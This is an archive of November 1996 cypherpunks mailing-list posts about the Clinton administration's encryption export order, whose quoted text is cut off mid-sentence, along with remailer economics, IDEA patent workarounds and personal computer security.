I will have a copy up on my web server (http://samsara.law.cwru.edu)
before the evening is over.

It seems (again just at a quick reading) that the government is now
limiting, or pretending to limit, its regulations on the ``export''
of cryptographic software to communications over the internet or on
bulletin boards.  As I read the Executive Orders they require that the
final regulations shall contain the same sort of restrictions on
crypto information that the Computer Decency Act applies to
indecency--if the CDA cases are upheld by the Supreme Court, I think
that these provisions will be struck down on the authority of that
decision.

The Executive Orders are not yet in effect.  That awaits the
proclamation of final regulations, which may be hard to draft--or may
be issued on Monday for all I know.

And argument in Junger v. Christopher is scheduled for Wednesday.

Law is fun!

Peter
--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu
		     URL:  http://samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Fri, 15 Nov 1996 21:05:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: IDEA patent
Message-ID: <199611160458.UAA17262@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



IDEA is a good algorithm much faster than 3DES and
probably stronger but its not very popular outside
of PGP because it is patented.

I remember someone posting here or in another
crypto list about a modified keyschedual to allow
keys of weird size.

My question is could this modification or
something more proven like PRNG-generated subkeys
be used to avoid the IDEA patent? Everyone says it
only takes a small change to avoid a patent. The
problem is a small change can break an algorithm.
Some algorithms like Blowfish generate subkeys
from a PRNG so it might be a safe change for IDEA.

I'm posting this anonymously because I dont know
what peoples feelings are on patent avoidance.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Davidson <abd@cdt.org>
Date: Fri, 15 Nov 1996 18:09:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Mirror of new export control regulations
In-Reply-To: <Pine.SUN.3.95.961115172400.27778G-100000@viper.law.miami.edu>
Message-ID: <v03007813aeb2cf590667@[204.157.127.123]>
MIME-Version: 1.0
Content-Type: text/plain



>http://www.law.miami.edu/~froomkin/nov96-regs.htm


It gets even more interesting.  In addition to signing today's Executive
Order on encryption, the President also designated Ambassador David L.
Aaron as the new "Special Envoy for Cryptography."  (Really, I'm not making
this up.)

According to the White House, this Special Envoy will have "responsibility
to promote the growth of electronic commerce and robust, secure global
communications in a manner that protects the public safety and national
security. . . . Ambassador Aaron will promote international cooperation,
coordinate U.S. contacts with foreign governments on encryption matters and
provide a focal point for identifying and resolving bilateral and
multilateral encryption issues."

CDT's Web site also has the text of the President's Executive Order,
Presidential Memorandum on Encryption Export Policy, and letter to
Congress, at

	http://www.cdt.org/crypto/clipper311

The White House Crypto Envoy press release should be posted there shortly.

What happens next?  According to the Administration, we can expect two new
Rules -- one from the State Department, transferring its jurisdiction to
Commerce; and one from the Commerce Department, spelling out exactly how it
will approve products for export, what the requirements for approved key
recovery centers and key recovery plans will look like, etc.  That last
rule is where the rubber really hits the road.  We'll finally have a chance
to talk concretely about whether the Administration's key recovery/export
control policy meets the privacy needs of computer users.  Hopefully there
will be a comment period for concerned parties to make their views known...


Alan Davidson, Staff Counsel                 202.637.9800 (v)
Center for Democracy and Technology          202.637.0968 (f)
1634 Eye St. NW, Suite 1100                  <abd@cdt.org>
Washington, DC 20006                         PGP key via finger








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Sat, 16 Nov 1996 08:07:22 -0800 (PST)
To: ph@netcom.com
Subject: Re: Remailer Pricing
Message-ID: <199611160510.VAA00606@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


From: ph@netcom.com (Peter Hendrickson)
> Right now the remailer network is a mess.  There just aren't that many
> remailers operating in a timely and reliable manner.  I am not knocking
> the remailer operators for this, it's just clear that "free" doesn't
> make it worth their while to keep the remailers operating perfectly
> at all times.

I agree with this very much.  For a long time we have had two contradictory
notions floating around: nobody will pay for remailing services because
free ones are available, and the remailer network can't be reliable because
the operators don't have the resources to make them work better.  Clearly
if people understand that the choice is between free remailers that don't
work well and for-pay ones which do, things look a little different.

Peter's idea of having the remailers keep accounts for people receiving
anonymous mail, possibly even sending them a monthly check, would
completely change the spam equation.

> Furthermore, many remailers don't use 2048-bit keys.  Why not?  Because
> they don't want to spend money on the cycles.  That's okay with me -
> it's charity.  But, if I pay a dollar for a remailer, I can expect
> to be able to use a very strong key.

Actually when I ran a remailer I had a small key because it was on a system
which I did not control.  The small key was meant as a signal to potential
users that my system wasn't all that secure.

The big problem that I always saw with the for-pay remailing model was
the fear of greater liability when abusive mail goes through the remailer.
I felt that operating a service for free would make it easier for me
to argue that I was offering a public service, while running it for pay
would mean that I would be profiting from the abuse.  I don't know if
this is really a valid argument, though.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Fri, 15 Nov 1996 21:20:00 -0800 (PST)
To: hallam@vesuvius.ai.mit.edu
Subject: Re: New Cryptography Regulations
Message-ID: <3.0b36.32.19961115211217.00dced24@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:05 PM 11/15/96 -0500, hallam@vesuvius.ai.mit.edu wrote:

>The main change is that from now on the decisions are to be made 
>by the department of commerce and not by the department of state.
>
>This is probably good news since the commerce department has the
>interests of industry as its primary mission.

I am expecting them to use the Interstate commerce clause in the
Constitution to enable them to enact whatever rules they want without that
pesky "freedom of speech" thing getting in the way.  I am sure that any
commerce secretary that dare to loosen the export restrictions would
quickly find him/herself out of a job.

Clinton and Gore have both shown that they get arroused at the thought of
being able to read everyone else's e-mail and listen to their phone calls.
I don't expect them to do anything that would thwart that fetish. (Power is
the ultamite turn-on.  When you can pry into the details of every part of a
person's life, you have a great deal of power.  Clinton/Gore/etc have shown
no resistance to that seduction.)

I expect that this will add more bodies to the LaBrea ITAR pits, not take
any away.

>There is a third document I believe but its not yet been issued.

Waiting for the third shoe to drop?

---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 15 Nov 1996 21:24:50 -0800 (PST)
To: Duncan Frissell <frissell@panix.com>
Subject: Re: One Big Telecoms Company
In-Reply-To: <3.0b36.32.19961115075321.006e0500@panix.com>
Message-ID: <328D4FD1.6B0D@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell wrote:
> At 07:02 PM 11/14/96 -0800, Dave Del Torto wrote:
> >Um, a _better_ one, now that government monopolies are largely out of the
> >way, leaving significant infrastructure for them to use? There's this one
> >little company called MCI, see, and there's this _other_ little company
> >called BT, and...

> There are now 150 Long Distance telephone companies in the US vs 1 when I
> was a kid.
> There are now 5 or 6 broadcast and 150 cable TV networks in the US vs 3
> when I was a kid.
> There will soon be 5 cellular and PCS companies in NYC vs 0 when I was a kid.
> There are now 6000 ISPs vs 0 when I was a kid.

Progress?  Most major cities (when I was a kid) had *several* competing
newspapers, some of which would *not* be afraid to print news about
(for example) a meeting of some of the world's top movers and shakers
outside of Toronto a few months ago.

Not today!  (BTW, even La Opinion in L.A. is run by a CFR member, as is
/was the AFL-CIO).

There wasn't any television when I was a kid, and frankly, there hasn't
been a significant improvement on that.

When I was a kid, you could expect to find phones anywhere that you could
use to call long distance with.  Today, the phone you find will probably
make it very difficult to get through to a reliable (price *and* service-
wise) provider, and when you do, you can get cut off after 3 minutes like
the outside phones do in Burbank on Victory Blvd., outside the McDonald's.
And of course, you could have someone call you back on those phones way
back when, which is getting rarer by the minute today.

The Internet *does* offer some freedom that we the people haven't enjoyed
much of in the past, but let's give it some time.  As I'm sure you know,
there's been a massive media consolidation in the U.S. in the past decade
or so, and it's continuing unabated.

Consider the above comments (by Duncan?) to be wishful thinking.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 15 Nov 1996 21:33:27 -0800 (PST)
To: m5@tivoli.com
Subject: Re: THAT is what makes John Gilmore an ASSHOLE!
In-Reply-To: <Pine.LNX.3.95.961115073500.2693I-100000@dhp.com>
Message-ID: <328D51CC.3853@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally wrote:
> aga wrote:
> > No it ain't; not after the list gets so big.  Public newsgroups
> > lose all rights of censorship by the owners, and that is law.

> Guffaw, guffaw.
> (So what if John decided simply to pull the plug on toad in order to
> plug in a new hot tub?)

Well, what if he did?  Are you sure that would make aga look like a fool,
or would it make you look like a fool, since it would tend to confirm
what people like aga have been saying?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 16 Nov 1996 11:38:43 -0800 (PST)
To: ph@netcom.com
Subject: Re: Remailer Abuse Solutions
In-Reply-To: <v02140b05aeb13a70acf4@[192.0.2.1]>
Message-ID: <199611152138.VAA00315@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Peter Hendrickson <ph@netcom.com> writes:
> However, if you restrict postings to an approved group of people, perhaps
> everybody on the mailing list, you can eliminate spam.  How, then, do we
> allow anonymous postings to come through?  Individual people on the list
> can receive the proposed post and forward it to the list if it is
> appropriate.  They could even charge a fee for doing it.  That's easy to
> do if there is a "paying" remailer which will handle the money for them.

Not necessarily a good idea.  The post may be a hot potatoe, and the
forwarder may find themselves in legal trouble.  (Say RC4 & RC2 source
code, NSA handbook, the results of the Mykotronic's dumpster diving
spree, etc).  Exercising `editorial control' has landed some ISPs in
trouble, to the extent that some are specifically avoiding it for that
legal reason alone.  Being _paid_ for forwarding the message may make
that even worse.

Often the posts which would get the anonymous poster (or the true name
forwarder) into the most troublle, are the ones which are most
interesting, and also very on topic.

Howabout someone liberates skipjack and forwards it to you via
remailers with $50 for your trouble.  Do you bite?  I thought not, NSA
interviews, ITAR violation, etc.

If the spam/off topic posts gets to you badly, perhaps you should
subscribe to a filtered list.  Newsreaders with ratings of posts and
reputation handling of posters would probably help a lot also.
Reputations alone doesn't work that well, many posters in my view are
not consistent, they post good stuff usually, but now and then get
drawn into rambling off topic, or noisy discussions, etc.

Ecash for email works better to stop spam sent directly to email
addresses where you don't cash the money as a curtesy, and your
software junks if it doesn't have valid ecash.  Email spam itself is
getting mildly annoying lately, I get a couple a day average at the
moment.

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Fri, 15 Nov 1996 21:49:30 -0800 (PST)
To: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Subject: Re: ideal secure personal computer system
Message-ID: <v02140b01aeb3002591ab@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>A friend of mine just got back from a kerberos conferance at MIT, at
>dinner one night they were talking about fun-n-easy ways to extract
>data from a machine. One of them mentioned that after a while, a "on"
>Of course, no computer is "secure" without a thermite charge above the
>hard drive, and a tamper-resistant case.
>"Well, Billy, the Sevret Service is here, they want to take away your
> computer (and telephone, and cassette tapes ,and etc.)"
>"Okay, mom. It's right over here, Mr. Scarry Secret Service dude."
><lift> "Ffffffts"
>"Hey, Billy, what's that smoke coming out of your computer?"
>

I discussed this seriously with an engineering acquaintence who has done
drive design for a number of major companies.  He thought this could be
easily achieved technically but might present some significant hurdles for
getting UL approval :-)  Seriously though, there might be a market for an
Mission Impossible drive retrofit kits which could be triggered by SW or
HW.

--Steve


PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Steve Schear             | Internet: azur@netcom.com
Lamarr Labs              | Voice: 1-702-658-2654
7075 West Gowan Road     | Fax: 1-702-658-2673
Suite 2148               |
Las Vegas, NV 89129      |
---------------------------------------------------------------------

Internet and Wireless Development

Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne, Libertarian, for President.
http://www.harrybrowne96.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 15 Nov 1996 18:52:03 -0800 (PST)
To: Hal Finney <hal@rain.org>
Subject: Re: National Emergency
Message-ID: <1.5.4.32.19961116025012.00719c0c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal Finney wrote:

>I found interesting is that it refers to the fact that we are currently
>living under a state of national emergency!  [Snip]

The same emergency was invoked for the same purpose in December,
1995, with citation of the elusive EO 12924 identical to the latest EO.

     See: http://jya.com/exporeg1.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 15 Nov 1996 21:50:42 -0800 (PST)
To: Hal Finney <cypherpunks@toad.com
Subject: Re: Playing Cards
Message-ID: <v02140b01aeb302e6b38c@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:04 PM 11/15/1996, Hal Finney wrote:
>From: ph@netcom.com (Peter Hendrickson)
>> A well shuffled deck of 54 cards has about 237 bits of entropy.  This
>> is easy to use: the program asks the order of the cards, converts this
>> to a string, and runs it through a one-way hash.  (Entering the cards
>> is a bit of a nuisance.  Is there an easy way to have them read
>> automatically?)

> I heard that Bruce Schneier has devised a cryptosystem based on a card
> deck for a future book by Neal Stephenson.  It is supposed to be simple
> enough for a person to use manually, but complicated enough that it can't
> be broken by computer.  Your idea of using cards as a one time pad is
> somewhat similar, maybe, although I think Bruce's was designed to be
> useful for long messages, providing computational rather than unconditional
> security.

I, for one, am dying of curiousity.  When I asked him about it, he said
he would disclose it "soon".

Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 15 Nov 1996 21:52:28 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: Re: [POLITICS] Re: Members of Parliament Problem
Message-ID: <v02140b02aeb30446063a@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:31 PM 11/15/1996, Adam Shostack wrote:
>        So, if 'anonymous Senator' came out for legalization, it would
> be declared that it was Kennedy, source of all Liberal Evil.  Good
> policy comes from leaders standing up and leading.  Since they don't,
> I'm a crypto-anarchist.  To try and help the Congress become more
> effective is not in anyones interest, except that class of person who
> makes their living off the workings of government.

>         There are lots of variations on the argument that politics is
> from the greek poly, meaning many, and ticks, a small bloodsucking
> animal.  My interest in creating new, consensual realities is that I
> don't want to be forced to care about the congress.

I may have misunderstood you, but when you suggested "disallowing"
Congressmen to use anonymity, it did not sound consensual.  Even
blood sucking parasites should be allowed to benefit from
cryptoanarchy.

I for one, would be most interested in what Congressmen would have
to say if they knew their words could in no way be traced back to
them.  I suspect that there are a lot of basketcases in Congress
and that this would become clear from the horrible things they would
have to say when they were sure nobody was looking.

Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 15 Nov 1996 19:57:57 -0800 (PST)
To: ph@netcom.com (Peter Hendrickson)
Subject: Re: Remailer Pricing
In-Reply-To: <v02140b07aeb1587ebcaf@[192.0.2.1]>
Message-ID: <199611160401.WAA00377@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> At 6:02 PM 11/14/1996, Mullen Patrick wrote:
> And, the long delays in sending messages through the remailers make it
> hard for people to get up and running because it takes hours to determine
> whether it worked, if it worked at all.
> A good pricing strategy for remailers would be to charge, say, $1 for
> instant delivery, $.50 for 30 minute delivery, etc.  To generate
> interest, 4 hour delays could be imposed for free remailing, if the
> resources are available.

     There is a good reason for the delays. 

     As far as I understand it, it deals with traffic analysis.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Fri, 15 Nov 1996 22:13:55 -0800 (PST)
To: Cypherpunks@toad.com
Subject: Time Digital: Crime Online
Message-ID: <v02140b02aeb307b85941@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


The winter edition of this bi-monthly has an amusing article, pg 54-58,
about how orgnaized crime is getting more organized with modern technology.
Cases in point:

* A Queens, NY bookie operation doing $65 million per year busted by taping
the their faxes and decoding their hard drives at least one of which had a
menchman's mother's name as the password.

* Cali cartels using up-to-date data management, encryption and SIGINT
methods.  A CIA quote, "...the level of sophistication of the Cali cartel
was about at the level of the KGB when the Soviet Union fell apart."

* According to the article the cost of 'scrubbing' money costs about $0.20
on the dollar in volume.

* The European Union Bank is mentioned as a possible safe haven for laundering.

Among the criminal's tools of the trade, cell phones, scanners and PGP.

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Fri, 15 Nov 1996 19:23:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ideal secure personal computer system
In-Reply-To: <l03010605aeab7149a687@[152.3.87.2]>
Message-ID: <0mXHB5200YUe0teHk0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Adam Gulkis <lordvidarr+@CMU.EDU> writes:
> a locked startup disk is not a good idea, if it is even possible.
> Most applications setup scratch space on the startup volume. 

It is possible, although it does break things, for example ResEdit and
AppleTalk. Then again, locking a disk doesn't gain you much security.

> It would
> be a better idea to setup a partition for applications and lock it, if
> you feel that is necessary.  Norton DiskLock is a nice tool that
> provides a startup password protection as well as screensaver
> password.  It will request a password if the machine sleeps or to
> reboot after a crash.

A good locking screen saver is essential, however, a driver level
password checker (which is what I assume Norton is) is not that
helpful. 
"Look ma! I stole Adam Gulkis's hard disk, now the secrets of the
 screaming viking lie open before me!" 
"That's nice dear, why don't you pop it in the machine and show your
 father?" 
"Okay <rummages with screwdrivers> Awww, Jeez, he used Norton
 DiskLock, I can't mount the drive."
"Here's a Silverlining disk, just 'update' the driver."
"Aw, thanks mom!"

You really do need to encrypt the drive, otherwise methods such as
replacing the drivers or reading the disk with a microscope will
extract the data quite easily.

A friend of mine just got back from a kerberos conferance at MIT, at
dinner one night they were talking about fun-n-easy ways to extract
data from a machine. One of them mentioned that after a while, a "on"
bit in RAM tends to leak out onto the surrounding sillicon, providing
a record of your memory. I'd imagine that your PGP passphrase sitting
in one location in memory for a few days would burn itself in pretty
good. The solution to this problem is to invert your RAM every once in
a while, so each bit is on and off for about the same amount of time.
I wonder if it'd be possible to build a device that goes between your
motherboard and your SIMMs that would invert and decode your RAM. I
could see wierd timing issues popping up, but I don't know enought
about OSes and computer architecture to know.

Of course, no computer is "secure" without a thermite charge above the
hard drive, and a tamper-resistant case.
"Well, Billy, the Sevret Service is here, they want to take away your
 computer (and telephone, and cassette tapes ,and etc.)"
"Okay, mom. It's right over here, Mr. Scarry Secret Service dude."
<lift> "Ffffffts"
"Hey, Billy, what's that smoke coming out of your computer?" 

Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMo0zPskz/YzIV3P5AQELwwMAgvAXIyzTpr6L4Niuy8G+dxzdRxNMBXB2
T8GvoXSLnD5DId/pefMHuKBg2qbKwUyEiQJH9wlUaY2Iq6XO4/nU5lMxyFUkkMbN
8Uah5HDxJ3r/UxWRXGFYXbaKlxuSkw0F
=edZH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Glenn C. Jones" <gcjones@speedlink.com>
Date: Fri, 15 Nov 1996 23:49:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Clinton Issues Exec Order on Crypto Export [long]
Message-ID: <328D6536.24DA@speedlink.com>
MIME-Version: 1.0
Content-Type: text/plain


November 15, 1996

TEXT OF A LETTER FROM THE PRESIDENT TO THE SPEAKER OF THE
HOUSE OF REPRESENTATIVES AND THE PRESIDENT OF THE SENATE


                           THE WHITE HOUSE
  
                    Office of the Press Secretary
  
  _______________________________________________________________
  
  For Immediate Release                         November 15, 1996
  
  
  
                        TEXT OF A LETTER FROM
                   THE PRESIDENT TO THE SPEAKER OF
                   THE HOUSE OF REPRESENTATIVES AND
                     THE PRESIDENT OF THE SENATE
  
  
                          November 15, 1996
  
  
  
  Dear Mr. Speaker:     (Dear Mr. President:)
  
  In order to take additional steps with respect to the 
  national emergency described and declared in Executive 
  Order 12924 of August 19, 1994, and continued on August 15, 
  1995, and August 14, 1996, necessitated by the expiration of 
  the Export Administration Act (EAA) on August 20, 1994, I hereby 
  report to the Congress that pursuant to section 204(b) of the 
  International Emergency Economic Powers Act, 50 U.S.C. 1703(b) 
  (the "Act"), I have today exercised the authority granted by the 
  Act to issue an Executive order (a copy of which is attached) to 
  revise the provisions that apply to the administration of the 
  export control system maintained by Department of Commerce in 
  the Export Administration Regulations, 15 CFR Part 730 et seq.
  
  The new Executive order relates to my decision to transfer 
  certain encryption products from the United States Munitions 
  List administered by the Department of State to the Commerce 
  Control List administered by the Department of Commerce.  
  When I made that decision I also decided to amend Executive 
  Order 12981 of December 5, 1995, which sets forth procedures 
  for the interagency review and disposition of dual-use export 
  license applications, to include the Department of Justice 
  among the agencies that have the opportunity to review such 
  applications with respect to encryption products transferred 
  to Department of Commerce control.
  
  Also, in issuing the new order, I provided for appropriate 
  controls on the export and foreign dissemination of encryption 
  products transferred to the Department of Commerce.  Among 
  other provisions, I determined that the export of encryption 
  products transferred to Department of Commerce control could 
  harm national security and foreign policy interests of the 
  United States even where comparable products are or appear to 
  be available from foreign sources.  Accordingly, the new order 
  makes clear that any EAA provision dealing with issuance of 
  licenses or removal of controls based on foreign availability 
  considerations shall not apply with respect to export controls 
  on such encryption products.  Notwithstanding this, the 
  Secretary of Commerce retains the discretion to consider the 
  foreign availability of comparable encryption products in any 
  particular case.
  
                                Sincerely,
  
  
                                WILLIAM J. CLINTON
  
  
                               #  #  #

                           THE WHITE HOUSE
  
                    Office of the Press Secretary
  
  _______________________________________________________________
  
  For Immediate Release                         November 15, 1996
  
  
  
                          November 15, 1996
  
  
  
  MEMORANDUM FOR THE VICE PRESIDENT
                 THE SECRETARY OF STATE
                 THE SECRETARY OF THE TREASURY
                 THE SECRETARY OF DEFENSE
                 THE ATTORNEY GENERAL
                 THE SECRETARY OF COMMERCE
                 UNITED STATES TRADE REPRESENTATIVE
                 DIRECTOR OF THE OFFICE OF MANAGEMENT AND BUDGET
                 CHIEF OF STAFF TO THE PRESIDENT
                 DIRECTOR OF CENTRAL INTELLIGENCE
                 DIRECTOR, FEDERAL BUREAU OF INVESTIGATION
                 DIRECTOR, NATIONAL SECURITY AGENCY
                 ASSISTANT TO THE PRESIDENT FOR NATIONAL
                    SECURITY AFFAIRS
                 ASSISTANT TO THE PRESIDENT FOR ECONOMIC POLICY
                 ASSISTANT TO THE PRESIDENT FOR SCIENCE AND
                    TECHNOLOGY POLICY
                 
  SUBJECT:       Encryption Export Policy
  
  
  Encryption products, when used outside the United States, can 
  jeopardize our foreign policy and national security interests.  
  Moreover, such products, when used by international criminal 
  organizations, can threaten the safety of U.S. citizens here 
  and abroad, as well as the safety of the citizens of other 
  countries.  The exportation of encryption products accordingly 
  must be controlled to further U.S. foreign policy objectives, 
  and promote our national security, including the protection of 
  the safety of U.S. citizens abroad.  Nonetheless, because of 
  the increasingly widespread use of encryption products for the 
  legitimate protection of the privacy of data and communications 
  in nonmilitary contexts; because of the importance to U.S. 
  economic interests of the market for encryption products; 
  and because, pursuant to the terms set forth in the Executive 
  order entitled Administration of Export Controls on Encryption 
  Products (the "new Executive order") of November 15, 1996, 
  Commerce Department controls of the export of such dual-use 
  encryption products can be accomplished without compromising 
  U.S. foreign policy objectives and national security interests, 
  I have determined at this time not to continue to designate such 
  encryption products as defense articles on the United States 
  Munitions List.
  
  Accordingly, under the powers vested in me by the Constitution 
  and the laws of the United States, I direct that:
  
  1.  Encryption products that presently are or would be 
  designated in Category XIII of the United States Munitions 
  List and regulated by the Department of State pursuant to 
  the Arms Export Control Act (22 U.S.C. 2778 et seq.) shall 
  be transferred to the Commerce Control List, and regulated 
  by the Department of Commerce under the authority conferred 
  in Executive Order 12924 of August 19, 1994 (as continued on 
  August 15, 1995, and August 14, 1996), Executive Order 12981 
  of December 5, 1995, and the new Executive order except 
  that encryption products specifically designed, developed, 
  configured, adapted, or modified for military applications 
  (including command, control, and intelligence applications), 
  shall continue to be designated as defense articles, shall 
  remain on the United States Munitions List, and shall continue 
  to be controlled under the Arms Export Control Act.  The 
  transfer described in this paragraph shall be effective upon 
  the issuance of final regulations (the "Final Regulations") 
  implementing the safeguards specified in this directive and 
  in the new Executive order.
  
  2.  The Final Regulations shall specify that the encryption 
  products specified in section 1 of this memorandum shall be 
  placed on the Commerce Control List administered by the 
  Department of Commerce.  The Department of Commerce shall, 
  to the extent permitted by law, administer the export of such 
  encryption products, including encryption software, pursuant 
  to the requirements of sections 5 and 6 of the former Export 
  Administration Act (50 U.S.C. App. 2405 and 2406), and the 
  regulations thereunder, as continued in effect by Executive 
  Order 12924 of August 19, 1994 (continued on August 15, 1995, 
  and on August 14, 1996), except as otherwise indicated in or 
  modified by the new Executive order, Executive Order 12981 of 
  December 5, 1995, and any Executive orders and laws cited 
  therein.
  
  3.  The Final Regulations shall provide that encryption 
  products described in section 1 of this memorandum can be 
  licensed for export only if the requirements of the controls 
  of both sections 5 and 6 of the former Export Administration 
  Act (50 U.S.C. App. 2405 and 2406), and the regulations 
  thereunder, as modified by the new Executive order, Executive 
  Order 12981 of December 5, 1995, and any Executive orders 
  and laws cited therein, are satisfied.  Consistent with 
  section 742.1(f) of the current Export Administration 
  Regulations, the Final Regulations shall ensure that a license 
  for such a product will be issued only if an application can 
  be and is approved under both section 5 and section 6.  The 
  controls on such products will apply to all destinations.  
  Except for those products transferred to the Commerce Control 
  List prior to the effective date of the Final Regulations, 
  exports and reexports of encryption products shall initially be 
  subject to case-by-case review to ensure that export thereof 
  would be consistent with U.S. foreign policy objectives and 
  national security interests, including the safety of U.S. 
  citizens.  Consideration shall be given to more liberalized 
  licensing treatment of each such individual product after 
  interagency review is completed.  The Final Regulations shall 
  also effectuate all other specific objectives and directives set 
  forth in this directive.
  
  4.  Because encryption source code can easily and mechanically 
  be transformed into object code, and because export of such 
  source code is controlled because of the code's functional 
  capacity, rather than because of any "information" such code 
  might convey, the Final Regulations shall specify that 
  encryption source code shall be treated as an encryption 
  product, and not as technical data or technology, for export 
  licensing purposes.
  
  5.  All provisions in the Final Regulations regarding 
  "de minimis" domestic content of items shall not apply with 
  respect to the encryption products described in paragraph 1 
  of this memorandum.
  
  6.  The Final Regulations shall, in a manner consistent with 
  section 16(5)(C) of the EAA, 50 U.S.C. App. 2415(5)(C), provide 
  that it will constitute an export of encryption source code 
  or object code software for a person to make such software 
  available for transfer outside the United States, over radio, 
  electromagnetic, photooptical, or photoelectric communications 
  facilities accessible to persons outside the United States, 
  including transfer from electronic bulletin boards and Internet 
  file transfer protocol sites, unless the party making the 
  software available takes precautions adequate to prevent the 
  unauthorized transfer of such code outside the United States.
  
  7.  Until the Final Regulations are issued, the Department of 
  State shall continue to have authority to administer the export 
  of encryption products described in section 1 of this memorandum 
  as defense articles designated in Category XIII of the United 
  States Munitions List, pursuant to the Arms Export Control Act.
  
  8.  Upon enactment of any legislation reauthorizing the 
  administration of export controls, the Secretary of Defense, 
  the Secretary of State, and the Attorney General shall reexamine 
  whether adequate controls on encryption products can be 
  maintained under the provisions of the new statute and advise 
  the Secretary of Commerce of their conclusions as well as any 
  recommendations for action.  If adequate controls on encryption 
  products cannot be maintained under a new statute, then such 
  products shall, where consistent with law, be designated or 
  redesignated as defense articles under 22 U.S.C. 2778(a)(1), 
  to be placed on the United States Munitions List and controlled 
  pursuant to the terms of the Arms Export Control Act and the 
  International Traffic in Arms Regulations.  Any disputes 
  regarding the decision to designate or redesignate shall be 
  resolved by the President.
  
  
  
                                     WILLIAM J. CLINTON
  
  
  
                                # # #

                           THE WHITE HOUSE
  
                    Office of the Press Secretary
  
  _______________________________________________________________
  
  For Immediate Release                         November 15, 1996
  
  
                           EXECUTIVE ORDER
  
                            - - - - - - -
  
       ADMINISTRATION OF EXPORT CONTROLS ON ENCRYPTION PRODUCTS
  
  
       By the authority vested in me as President by the 
  Constitution and the laws of the United States of America, 
  including but not limited to the International Emergency 
  Economic Powers Act (50 U.S.C. 1701 et seq.), and in order to 
  take additional steps with respect to the national emergency 
  described and declared in Executive Order 12924 of August 19, 
  1994, and continued on August 15, 1995, and on August 14, 1996, 
  I, WILLIAM J. CLINTON, President of the United States of 
  America, have decided that the provisions set forth below shall 
  apply to administration of the export control system maintained 
  by the Export Administration Regulations, 15 CFR Part 730 
  et seq. ("the EAR").  Accordingly, it is hereby ordered as 
  follows:
  
       Section 1.  Treatment of Encryption Products.  In order 
  to provide for appropriate controls on the export and foreign 
  dissemination of encryption products, export controls of 
  encryption products that are or would be, on this date, 
  designated as defense articles in Category XIII of the 
  United States Munitions List and regulated by the United States 
  Department of State pursuant to the Arms Export Control Act, 
  22 U.S.C. 2778 et seq. ("the AECA"), but that subsequently are 
  placed on the Commerce Control List in the EAR, shall be subject 
